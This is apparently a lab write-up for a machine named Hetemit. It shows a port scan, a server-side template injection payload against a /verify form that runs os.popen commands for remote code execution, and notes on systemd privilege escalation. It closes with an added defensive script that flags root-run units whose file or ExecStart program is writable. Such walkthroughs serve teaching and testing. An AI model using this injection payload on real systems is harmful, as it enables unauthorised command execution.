Hetemit

Enumeration

50000/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.6.8)
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
http://192.168.181.117:50000/verify

In the response:
{code}
---
POST /verify HTTP/1.1
Host: 192.168.181.117:50000
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

code={5*5}

In the response:
{25}
---
SSTI to RCE
---
POST /verify HTTP/1.1
code={os.popen("id").read()}

In the response:
{'uid=1000(cmeeks) gid=1000(cmeeks) groups=1000(cmeeks)\n'}

Initial Access

PrivEsc

The most important parameters in the service unit file are:

• User: the user the service runs as.

• ExecStart: the command that runs when the service starts.

Now we want a shell as root. There are many ways to get one through systemd services.
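The misconfiguration that typically turns a systemd service into a root shell is a unit that runs as root while its unit file or the program named in ExecStart is writable by ordinary users. The audit script below is added here and is not part of this writeup (which does not name the service it used); it parses a unit file and flags that condition, and the unit text, paths and writability stub in it are constructed for the example.

```python
import os
import stat

def parse_service_section(unit_text):
    """Return the key/value pairs of the [Service] section of a unit file."""
    section, values = None, {}
    for line in unit_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Service" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    return values

def loosely_writable(path):
    """True if group or world may write the path; the default check on a live host."""
    try:
        return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except FileNotFoundError:
        return False

def audit_unit(unit_path, unit_text, writable=loosely_writable):
    """Flag a unit that runs as root while its file or ExecStart program is loosely writable."""
    svc = parse_service_section(unit_text)
    user = svc.get("User", "root")  # systemd runs the service as root when User= is absent
    exec_start = svc.get("ExecStart", "")
    # ExecStart may carry prefix modifiers such as "-", "@" or "+"; the first token is the program
    program = exec_start.split()[0].lstrip("-@+!:") if exec_start else ""
    findings = []
    if user == "root" and writable(unit_path):
        findings.append(f"{unit_path} is group/world-writable and the service runs as root")
    if user == "root" and program and writable(program):
        findings.append(f"ExecStart program {program} is group/world-writable and runs as root")
    return {"user": user, "program": program, "findings": findings}

EXAMPLE_UNIT = "/etc/systemd/system/cleanup.service"  # constructed, hypothetical path
EXAMPLE_TEXT = """[Unit]
Description=constructed example unit, not from the target
[Service]
ExecStart=-/opt/cleanup/cleanup.sh --quiet
"""

def demo():
    # Stub writability check: pretend only the launched script is world-writable.
    fake_writable = lambda path: path == "/opt/cleanup/cleanup.sh"
    return audit_unit(EXAMPLE_UNIT, EXAMPLE_TEXT, writable=fake_writable)
```

On a real host, call audit_unit() with the unit's path and contents and leave the default writability check in place.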
